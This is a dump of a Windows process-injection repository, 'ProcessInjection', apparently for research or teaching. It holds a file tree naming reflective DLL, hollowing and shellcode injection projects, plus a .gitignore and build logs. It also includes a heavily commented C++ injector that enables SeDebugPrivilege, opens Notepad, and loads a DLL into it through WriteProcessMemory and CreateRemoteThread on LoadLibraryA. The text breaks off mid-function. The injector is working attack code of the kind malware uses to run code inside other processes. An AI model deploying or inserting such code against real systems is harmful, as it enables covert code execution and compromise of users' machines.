├── .gitignore
├── .vs
└── ProcessInjection
│ └── v14
│ └── .suo
├── CommonInjection
├── CommonInjection.vcxproj
├── CommonInjection.vcxproj.filters
├── CommonInjection.vcxproj.user
├── Debug
│ ├── CommonInjection.log
│ ├── CommonInjection.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── CommonInjection.lastbuildstate
│ │ ├── link.command.1.tlog
│ │ ├── link.read.1.tlog
│ │ └── link.write.1.tlog
│ ├── main.obj.enc
│ ├── vc140.idb
│ └── vc140.pdb
├── Release
│ ├── CommonInjection.log
│ ├── CommonInjection.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── CommonInjection.lastbuildstate
│ │ ├── link.command.1.tlog
│ │ ├── link.read.1.tlog
│ │ └── link.write.1.tlog
│ └── vc140.pdb
├── main.cpp
└── x64
│ ├── Debug
│ └── CommonInjection.log
│ └── Release
│ └── CommonInjection.log
├── DLLTest
├── DLLTest.cpp
├── DLLTest.vcxproj
├── DLLTest.vcxproj.filters
├── Debug
│ ├── DLLTest.Build.CppClean.log
│ └── DLLTest.log
├── InjectionDLL.h
├── ReadMe.txt
├── stdafx.cpp
├── stdafx.h
├── targetver.h
└── x64
│ ├── Debug
│ └── DLLTest.log
│ └── Release
│ └── DLLTest.log
├── EXEPayload
├── Debug
│ └── EXEPayload.log
├── EXEPayload.vcxproj
├── EXEPayload.vcxproj.filters
├── main.cpp
├── main.h
└── x64
│ └── Debug
│ └── EXEPayload.log
├── Gargoyle
├── Gargoyle.cpp
├── Gargoyle.vcxproj
├── Gargoyle.vcxproj.filters
├── ReadMe.txt
├── gadget.nasm
├── setup.nasm
└── stdafx.h
├── HollowingDropper
├── Debug
│ └── HollowingDropper.log
├── HollowingDropper.vcxproj
├── HollowingDropper.vcxproj.filters
├── HollowingProcess.cpp
├── PE.cpp
├── PE.h
├── main.cpp
├── stdafx.h
└── x64
│ └── Debug
│ └── HollowingDropper.log
├── Images
├── PE - Copy.jpg
└── PEB.jpg
├── InjectionDLL
├── Debug
│ ├── InjectionDLL.Build.CppClean.log
│ └── InjectionDLL.log
├── InjectionDLL.cpp
├── InjectionDLL.def
├── InjectionDLL.h
├── InjectionDLL.vcxproj
├── InjectionDLL.vcxproj.filters
├── InjectionDLL.vcxproj.user
├── ReadMe.txt
├── dllmain.cpp
├── stdafx.cpp
├── stdafx.h
├── targetver.h
└── x64
│ ├── Debug
│ └── InjectionDLL.log
│ └── Release
│ └── InjectionDLL.log
├── LICENSE
├── MEMORY MODULE
├── .vs
│ └── MEMORY MODULE
│ │ └── v14
│ │ └── .suo
├── Debug
│ ├── MEMORY MODULE.log
│ └── MEMORY MODULE.tlog
│ │ └── unsuccessfulbuild
├── Loader.c
├── Loader.h
├── MEMORY MODULE.vcxproj
├── MEMORY MODULE.vcxproj.filters
├── MoudleMain.cpp
└── x64
│ └── Debug
│ └── MEMORY MODULE.log
├── MemroyInjectionDLL
├── Debug
│ └── MemroyInjectionDLL.log
├── MemroyInjectionDLL.cpp
├── MemroyInjectionDLL.h
├── MemroyInjectionDLL.vcxproj
├── MemroyInjectionDLL.vcxproj.filters
├── ReadMe.txt
├── dllmain.cpp
├── stdafx.cpp
├── stdafx.h
├── targetver.h
└── x64
│ └── Debug
│ └── MemroyInjectionDLL.log
├── ProcessInjection.VC.db
├── ProcessInjection.sln
├── README.md
├── ReflectiveDLL
├── Debug
│ ├── ReflectiveDLL.log
│ ├── ReflectiveDLL.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── ReflectiveDLL.lastbuildstate
│ │ └── unsuccessfulbuild
│ ├── vc140.idb
│ └── vc140.pdb
├── ReadMe.txt
├── ReflectiveDLL.cpp
├── ReflectiveDLL.def
├── ReflectiveDLL.vcxproj
├── ReflectiveDLL.vcxproj.filters
├── ReflectiveLoader.h
├── dllmain.cpp
├── stdafx.cpp
├── stdafx.h
├── targetver.h
└── x64
│ ├── Debug
│ ├── ReflectiveDLL.Build.CppClean.log
│ ├── ReflectiveDLL.log
│ ├── ReflectiveDLL.tlog
│ │ ├── CL.command.1.tlog
│ │ ├── CL.read.1.tlog
│ │ ├── CL.write.1.tlog
│ │ ├── ReflectiveDLL.lastbuildstate
│ │ ├── ReflectiveDLL.write.1u.tlog
│ │ ├── link.command.1.tlog
│ │ ├── link.read.1.tlog
│ │ └── link.write.1.tlog
│ ├── vc140.idb
│ └── vc140.pdb
│ └── Release
│ └── ReflectiveDLL.log
├── ReflectiveDLLInjection
├── .vs
│ └── ReflectiveDLLInjection
│ │ └── v14
│ │ └── .suo
├── Debug
│ └── ReflectiveDLLInjection.log
├── LoadRemoteLibraryR.cpp
├── LoadRemoteLibraryR.h
├── ReadMe.txt
├── ReflectiveDLLInjection.cpp
├── ReflectiveDLLInjection.h
├── ReflectiveDLLInjection.vcxproj
├── ReflectiveDLLInjection.vcxproj.filters
├── ReflectiveDLLInjection.vcxproj.user
├── stdafx.cpp
├── stdafx.h
├── targetver.h
└── x64
│ ├── Debug
│ ├── ReflectiveDLLInjection.Build.CppClean.log
│ └── ReflectiveDLLInjection.log
│ └── Release
│ └── ReflectiveDLLInjection.log
├── ReflectiveDLLPEForm
├── ReflectiveDLLPEForm.vcxproj
├── ReflectiveDLLPEForm.vcxproj.filters
├── ReflectiveDemo.cpp
├── ReflectiveLoader.c
├── ReflectiveLoader.h
└── x64
│ ├── Debug
│ ├── Reflecti.3AD41A2B.tlog
│ │ └── unsuccessfulbuild
│ └── ReflectiveDLLPEForm.log
│ └── Release
│ └── ReflectiveDLLPEForm.log
└── ShellcodeInjection
├── ShellcodeInjection.vcxproj
├── ShellcodeInjection.vcxproj.filters
└── main.cpp
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.suo
8 | *.user
9 | *.userosscache
10 | *.sln.docstates
11 |
12 | # User-specific files (MonoDevelop/Xamarin Studio)
13 | *.userprefs
14 |
15 | # Build results
16 | [Dd]ebug/
17 | [Dd]ebugPublic/
18 | [Rr]elease/
19 | [Rr]eleases/
20 | x64/
21 | x86/
22 | bld/
23 | [Bb]in/
24 | [Oo]bj/
25 | [Ll]og/
26 |
27 | # Visual Studio 2015 cache/options directory
28 | .vs/
29 | # Uncomment if you have tasks that create the project's static files in wwwroot
30 | #wwwroot/
31 |
32 | # MSTest test Results
33 | [Tt]est[Rr]esult*/
34 | [Bb]uild[Ll]og.*
35 |
36 | # NUNIT
37 | *.VisualState.xml
38 | TestResult.xml
39 |
40 | # Build Results of an ATL Project
41 | [Dd]ebugPS/
42 | [Rr]eleasePS/
43 | dlldata.c
44 |
45 | # .NET Core
46 | project.lock.json
47 | project.fragment.lock.json
48 | artifacts/
49 | **/Properties/launchSettings.json
50 |
51 | *_i.c
52 | *_p.c
53 | *_i.h
54 | *.ilk
55 | *.meta
56 | *.obj
57 | *.pch
58 | *.pdb
59 | *.pgc
60 | *.pgd
61 | *.rsp
62 | *.sbr
63 | *.tlb
64 | *.tli
65 | *.tlh
66 | *.tmp
67 | *.tmp_proj
68 | *.log
69 | *.vspscc
70 | *.vssscc
71 | .builds
72 | *.pidb
73 | *.svclog
74 | *.scc
75 |
76 | # Chutzpah Test files
77 | _Chutzpah*
78 |
79 | # Visual C++ cache files
80 | ipch/
81 | *.aps
82 | *.ncb
83 | *.opendb
84 | *.opensdf
85 | *.sdf
86 | *.cachefile
87 | *.VC.db
88 | *.VC.VC.opendb
89 |
90 | # Visual Studio profiler
91 | *.psess
92 | *.vsp
93 | *.vspx
94 | *.sap
95 |
96 | # TFS 2012 Local Workspace
97 | $tf/
98 |
99 | # Guidance Automation Toolkit
100 | *.gpState
101 |
102 | # ReSharper is a .NET coding add-in
103 | _ReSharper*/
104 | *.[Rr]e[Ss]harper
105 | *.DotSettings.user
106 |
107 | # JustCode is a .NET coding add-in
108 | .JustCode
109 |
110 | # TeamCity is a build add-in
111 | _TeamCity*
112 |
113 | # DotCover is a Code Coverage Tool
114 | *.dotCover
115 |
116 | # Visual Studio code coverage results
117 | *.coverage
118 | *.coveragexml
119 |
120 | # NCrunch
121 | _NCrunch_*
122 | .*crunch*.local.xml
123 | nCrunchTemp_*
124 |
125 | # MightyMoose
126 | *.mm.*
127 | AutoTest.Net/
128 |
129 | # Web workbench (sass)
130 | .sass-cache/
131 |
132 | # Installshield output folder
133 | [Ee]xpress/
134 |
135 | # DocProject is a documentation generator add-in
136 | DocProject/buildhelp/
137 | DocProject/Help/*.HxT
138 | DocProject/Help/*.HxC
139 | DocProject/Help/*.hhc
140 | DocProject/Help/*.hhk
141 | DocProject/Help/*.hhp
142 | DocProject/Help/Html2
143 | DocProject/Help/html
144 |
145 | # Click-Once directory
146 | publish/
147 |
148 | # Publish Web Output
149 | *.[Pp]ublish.xml
150 | *.azurePubxml
151 | # TODO: Comment the next line if you want to checkin your web deploy settings
152 | # but database connection strings (with potential passwords) will be unencrypted
153 | *.pubxml
154 | *.publishproj
155 |
156 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
157 | # checkin your Azure Web App publish settings, but sensitive information contained
158 | # in these scripts will be unencrypted
159 | PublishScripts/
160 |
161 | # NuGet Packages
162 | *.nupkg
163 | # The packages folder can be ignored because of Package Restore
164 | **/packages/*
165 | # except build/, which is used as an MSBuild target.
166 | !**/packages/build/
167 | # Uncomment if necessary however generally it will be regenerated when needed
168 | #!**/packages/repositories.config
169 | # NuGet v3's project.json files produces more ignorable files
170 | *.nuget.props
171 | *.nuget.targets
172 |
173 | # Microsoft Azure Build Output
174 | csx/
175 | *.build.csdef
176 |
177 | # Microsoft Azure Emulator
178 | ecf/
179 | rcf/
180 |
181 | # Windows Store app package directories and files
182 | AppPackages/
183 | BundleArtifacts/
184 | Package.StoreAssociation.xml
185 | _pkginfo.txt
186 |
187 | # Visual Studio cache files
188 | # files ending in .cache can be ignored
189 | *.[Cc]ache
190 | # but keep track of directories ending in .cache
191 | !*.[Cc]ache/
192 |
193 | # Others
194 | ClientBin/
195 | ~$*
196 | *~
197 | *.dbmdl
198 | *.dbproj.schemaview
199 | *.jfm
200 | *.pfx
201 | *.publishsettings
202 | orleans.codegen.cs
203 |
204 | # Since there are multiple workflows, uncomment next line to ignore bower_components
205 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
206 | #bower_components/
207 |
208 | # RIA/Silverlight projects
209 | Generated_Code/
210 |
211 | # Backup & report files from converting an old project file
212 | # to a newer Visual Studio version. Backup files are not needed,
213 | # because we have git ;-)
214 | _UpgradeReport_Files/
215 | Backup*/
216 | UpgradeLog*.XML
217 | UpgradeLog*.htm
218 |
219 | # SQL Server files
220 | *.mdf
221 | *.ldf
222 | *.ndf
223 |
224 | # Business Intelligence projects
225 | *.rdl.data
226 | *.bim.layout
227 | *.bim_*.settings
228 |
229 | # Microsoft Fakes
230 | FakesAssemblies/
231 |
232 | # GhostDoc plugin setting file
233 | *.GhostDoc.xml
234 |
235 | # Node.js Tools for Visual Studio
236 | .ntvs_analysis.dat
237 | node_modules/
238 |
239 | # Typescript v1 declaration files
240 | typings/
241 |
242 | # Visual Studio 6 build log
243 | *.plg
244 |
245 | # Visual Studio 6 workspace options file
246 | *.opt
247 |
248 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
249 | *.vbw
250 |
251 | # Visual Studio LightSwitch build output
252 | **/*.HTMLClient/GeneratedArtifacts
253 | **/*.DesktopClient/GeneratedArtifacts
254 | **/*.DesktopClient/ModelManifest.xml
255 | **/*.Server/GeneratedArtifacts
256 | **/*.Server/ModelManifest.xml
257 | _Pvt_Extensions
258 |
259 | # Paket dependency manager
260 | .paket/paket.exe
261 | paket-files/
262 |
263 | # FAKE - F# Make
264 | .fake/
265 |
266 | # JetBrains Rider
267 | .idea/
268 | *.sln.iml
269 |
270 | # CodeRush
271 | .cr/
272 |
273 | # Python Tools for Visual Studio (PTVS)
274 | __pycache__/
275 | *.pyc
276 |
277 | # Cake - Uncomment if you are using it
278 | # tools/**
279 | # !tools/packages.config
280 |
281 | # Telerik's JustMock configuration file
282 | *.jmconfig
283 |
284 | # BizTalk build output
285 | *.btp.cs
286 | *.btm.cs
287 | *.odx.cs
288 | *.xsd.cs
289 |
--------------------------------------------------------------------------------
/.vs/ProcessInjection/v14/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/.vs/ProcessInjection/v14/.suo
--------------------------------------------------------------------------------
/CommonInjection/CommonInjection.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {D605C71D-D52F-4629-9020-4A7C04455FAB}
23 | Win32Proj
24 | CommonInjection
25 | 8.1
26 |
27 |
28 |
29 | Application
30 | true
31 | v140
32 | Unicode
33 |
34 |
35 | Application
36 | false
37 | v140
38 | true
39 | Unicode
40 |
41 |
42 | Application
43 | true
44 | v140
45 | Unicode
46 |
47 |
48 | Application
49 | false
50 | v140
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 | C:\Program Files %28x86%29\Windows Kits\10\Include\10.0.10150.0\ucrt;$(IncludePath)
75 | C:\Program Files %28x86%29\Windows Kits\10\Lib\10.0.10150.0\ucrt\x86;$(LibraryPath)
76 |
77 |
78 | true
79 |
80 |
81 | false
82 | $(VC_IncludePath);$(WindowsSDK_IncludePath);C:\Program Files %28x86%29\Windows Kits\10\Include\10.0.10150.0\ucrt;$(IncludePath)
83 | C:\Program Files %28x86%29\Windows Kits\10\Lib\10.0.10150.0\ucrt\x86;$(LibraryPath);$(VC_LibraryPath_x86);$(WindowsSDK_LibraryPath_x86)
84 |
85 |
86 | false
87 |
88 |
89 |
90 | NotUsing
91 | Level3
92 | Disabled
93 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
94 | true
95 |
96 |
97 | Console
98 | true
99 |
100 |
101 |
102 |
103 |
104 |
105 | Level3
106 | Disabled
107 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
108 | true
109 |
110 |
111 | Console
112 | true
113 |
114 |
115 |
116 |
117 | Level3
118 |
119 |
120 | MaxSpeed
121 | true
122 | true
123 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
124 | true
125 |
126 |
127 | Console
128 | true
129 | true
130 | true
131 |
132 |
133 |
134 |
135 | Level3
136 |
137 |
138 | MaxSpeed
139 | true
140 | true
141 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
142 | true
143 |
144 |
145 | Console
146 | true
147 | true
148 | true
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
--------------------------------------------------------------------------------
/CommonInjection/CommonInjection.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Resource Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/CommonInjection/CommonInjection.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/CommonInjection/Debug/CommonInjection.log:
--------------------------------------------------------------------------------
1 | CommonInjection.vcxproj -> d:\users\sudo\documents\visual studio 2015\Projects\ProcessInjection\Debug\CommonInjection.exe
2 | CommonInjection.vcxproj -> d:\users\sudo\documents\visual studio 2015\Projects\ProcessInjection\Debug\CommonInjection.pdb (Full PDB)
3 |
--------------------------------------------------------------------------------
/CommonInjection/Debug/CommonInjection.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/CommonInjection.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Debug/CommonInjection.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/CommonInjection.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Debug/CommonInjection.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/CommonInjection.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Debug/CommonInjection.tlog/CommonInjection.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
2 | Debug|Win32|d:\users\sudo\documents\visual studio 2015\Projects\ProcessInjection\|
3 |
--------------------------------------------------------------------------------
/CommonInjection/Debug/CommonInjection.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/CommonInjection.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Debug/CommonInjection.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/CommonInjection.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Debug/CommonInjection.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/CommonInjection.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Debug/main.obj.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/main.obj.enc
--------------------------------------------------------------------------------
/CommonInjection/Debug/vc140.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/vc140.idb
--------------------------------------------------------------------------------
/CommonInjection/Debug/vc140.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Debug/vc140.pdb
--------------------------------------------------------------------------------
/CommonInjection/Release/CommonInjection.log:
--------------------------------------------------------------------------------
1 | Generating code
2 | All 2 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
3 | Finished generating code
4 | CommonInjection.vcxproj -> d:\users\sudo\documents\visual studio 2015\Projects\ProcessInjection\Release\CommonInjection.exe
5 | CommonInjection.vcxproj -> d:\users\sudo\documents\visual studio 2015\Projects\ProcessInjection\Release\CommonInjection.pdb (Full PDB)
6 |
--------------------------------------------------------------------------------
/CommonInjection/Release/CommonInjection.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Release/CommonInjection.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Release/CommonInjection.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Release/CommonInjection.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Release/CommonInjection.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Release/CommonInjection.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Release/CommonInjection.tlog/CommonInjection.lastbuildstate:
--------------------------------------------------------------------------------
1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v140:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=8.1
2 | Release|Win32|d:\users\sudo\documents\visual studio 2015\Projects\ProcessInjection\|
3 |
--------------------------------------------------------------------------------
/CommonInjection/Release/CommonInjection.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Release/CommonInjection.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Release/CommonInjection.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Release/CommonInjection.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Release/CommonInjection.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Release/CommonInjection.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/CommonInjection/Release/vc140.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sud01oo/ProcessInjection/6d89cee0f274b3fac1381c6e99ed18ef4ab899f2/CommonInjection/Release/vc140.pdb
--------------------------------------------------------------------------------
/CommonInjection/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | using namespace std;
5 |
// Enables SeDebugPrivilege on the current process token (defined below).
void PrivilegeEscalation();
// Opens a handle to the notepad.exe target. Despite the name it returns a
// process HANDLE (from OpenProcess), not a PID; the PID is only printed.
HANDLE GetThePidOfTargetProcess();
// Writes InjectionDllPath into the target and starts a remote thread at
// kernel32!LoadLibraryA with that buffer as its argument.
BOOL DoInjection(char *InjectionDllPath, HANDLE injectionProcessHandle);
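// Entry point: enable SeDebugPrivilege, open the target notepad.exe and load
// InjectionDllPath into it via DoInjection(). The path is resolved by
// LoadLibraryA *inside the target*, so the DLL must exist at that path on the
// machine running the target and match its bitness.
// Returns 0 on success, 1 when the target cannot be opened or the injection fails.
int main()
{
	char InjectionDllPath[] = { "D:\\InjectionDLL.dll" };

	// Enable SeDebugPrivilege *before* OpenProcess(): OpenProcess is the call
	// that needs it (targets owned by another user / higher integrity).
	// The original enabled it after the handle was already opened, too late.
	PrivilegeEscalation();

	//Get the pid of notepad.exe which is to be injected.
	HANDLE injectionProcessHandle = GetThePidOfTargetProcess();
	if (injectionProcessHandle == NULL)
	{
		// Do not continue with a NULL handle; every later call would fail.
		cout << "Can't Get The PID" << endl;
		system("pause");
		return 1;
	}

	int exitCode = 1;
	if (DoInjection(InjectionDllPath, injectionProcessHandle))
	{
		cout << "Injection Success" << endl;
		exitCode = 0;
	}
	else
	{
		cout << "Inject Failed!" << endl;
	}

	// The handle came from OpenProcess(); release it before exiting.
	CloseHandle(injectionProcessHandle);
	system("pause");
	return exitCode;
}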
31 |
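// Finds the top-level window titled "Untitled - Notepad", resolves the process
// that owns it and opens a handle to that process.
// Returns NULL when the window is not found, the owner cannot be resolved, or
// OpenProcess() fails (GetLastError() then holds the reason). The caller owns
// the returned handle and must CloseHandle() it.
// Despite the name this returns a process HANDLE, not a PID. The window title
// is locale-dependent, so only an English Notepad with an unsaved document matches.
HANDLE GetThePidOfTargetProcess()
{
	HWND injectionProcessHwnd = FindWindowA(0, "Untitled - Notepad");
	if (injectionProcessHwnd == NULL)
	{
		cout << "Can't find the Notepad window!" << endl;
		return NULL;
	}

	// GetWindowThreadProcessId() leaves the out-parameter untouched on failure;
	// the original passed it uninitialised straight into OpenProcess().
	DWORD dwInjectionProcessID = 0;
	if (GetWindowThreadProcessId(injectionProcessHwnd, &dwInjectionProcessID) == 0 || dwInjectionProcessID == 0)
	{
		cout << "Can't resolve the process owning the window!" << endl;
		return NULL;
	}
	cout << "Notepad's pid -> " << dwInjectionProcessID << endl;

	// Least privilege: request only what VirtualAllocEx / WriteProcessMemory /
	// CreateRemoteThread need instead of PROCESS_ALL_ACCESS. This also succeeds
	// against targets whose DACL denies full access but grants these rights.
	const DWORD desiredAccess = PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
	                            PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ;
	HANDLE injectionProcessHandle = ::OpenProcess(desiredAccess, FALSE, dwInjectionProcessID);
	if (injectionProcessHandle == NULL)
	{
		cout << "OpenProcess failed, error " << GetLastError() << endl;
	}
	return injectionProcessHandle;
}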
43 |
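// Enables SeDebugPrivilege on the current process token so OpenProcess() can
// succeed against processes owned by other users. The privilege only exists on
// an administrative (elevated) token; on a plain user token it cannot be enabled.
// Failures are reported on stdout instead of aborting, because injecting into a
// process owned by the same user works without the privilege.
void PrivilegeEscalation()
{
	HANDLE hToken = NULL;
	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
	{
		cout << "OpenProcessToken failed, error " << GetLastError() << endl;
		return;
	}

	LUID luid;
	if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
	{
		cout << "LookupPrivilegeValue failed, error " << GetLastError() << endl;
		CloseHandle(hToken);
		return;
	}

	TOKEN_PRIVILEGES tp;
	tp.PrivilegeCount = 1;
	tp.Privileges[0].Luid = luid;
	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	// AdjustTokenPrivileges returns TRUE even when the privilege was NOT granted;
	// ERROR_NOT_ALL_ASSIGNED from GetLastError() is the real verdict.
	if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
	{
		cout << "AdjustTokenPrivileges failed, error " << GetLastError() << endl;
	}
	else if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
	{
		cout << "SeDebugPrivilege is not held by this token (run elevated?)" << endl;
	}

	// The token handle was leaked by the original.
	CloseHandle(hToken);
}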
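// Loads the DLL at InjectionDllPath into the target process: the path string is
// copied into memory allocated in the target and a remote thread is started at
// kernel32!LoadLibraryA with that buffer as its sole argument.
// Returns TRUE only when the remote LoadLibraryA returned a non-NULL module
// handle; FALSE on any allocation/write/thread failure, on timeout, or when the
// target could not load the DLL (the original returned TRUE as soon as the
// thread existed, even if the DLL never loaded).
// Relies on kernel32 being mapped at the same base in both processes, which
// holds for same-bitness processes in the same boot session; a 32-bit injector
// cannot target a 64-bit process this way and vice versa.
BOOL DoInjection(char *InjectionDllPath,HANDLE injectionProcessHandle)
{
	if (InjectionDllPath == NULL || injectionProcessHandle == NULL)
	{
		cout << "Invalid DLL path or process handle!" << endl;
		return FALSE;
	}

	// The path is a narrow (char) string, so size it with lstrlenA. The original
	// lstrlen((LPCWSTR)...) scanned the buffer as UTF-16 and read past its end.
	SIZE_T injBufSize = (SIZE_T)lstrlenA(InjectionDllPath) + 1;
	LPVOID AllocAddr = VirtualAllocEx(injectionProcessHandle, NULL, injBufSize, MEM_COMMIT, PAGE_READWRITE);
	if (AllocAddr == NULL)
	{
		cout << "Alloc memory failed!" << endl;
		return FALSE;
	}
	cout << "Alloc Memory success!" << endl;

	BOOL result = FALSE;
	BOOL bufferStillInUse = FALSE;
	SIZE_T written = 0;
	if (!WriteProcessMemory(injectionProcessHandle, AllocAddr, InjectionDllPath, injBufSize, &written) || written != injBufSize)
	{
		cout << "Write DLL path failed, error " << GetLastError() << endl;
	}
	else
	{
		PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA");
		// Cast to void*: streaming a function pointer selects operator<<(bool)
		// and would print "1" instead of the address.
		cout << "The LoadLibrary's Address is:" << reinterpret_cast<void*>(pfnStartAddr) << endl;
		if (pfnStartAddr == NULL)
		{
			cout << "Can't resolve LoadLibraryA!" << endl;
		}
		else
		{
			HANDLE hRemoteThread = CreateRemoteThread(injectionProcessHandle, NULL, 0, pfnStartAddr, AllocAddr, 0, NULL);
			if (hRemoteThread == NULL)
			{
				cout << "Create Remote Thread Failed!" << endl;
			}
			else
			{
				cout << "Create Remote Thread Success!" << endl;
				// A created thread only proves CreateRemoteThread worked. The
				// thread's exit code is LoadLibraryA's return value (truncated to
				// 32 bits on x64, but a NULL HMODULE stays 0) and tells whether
				// the DLL actually loaded. Bounded wait: a DllMain that blocks
				// would otherwise hang the injector forever.
				DWORD waitResult = WaitForSingleObject(hRemoteThread, 10000);
				if (waitResult != WAIT_OBJECT_0)
				{
					cout << "Timed out waiting for the remote thread!" << endl;
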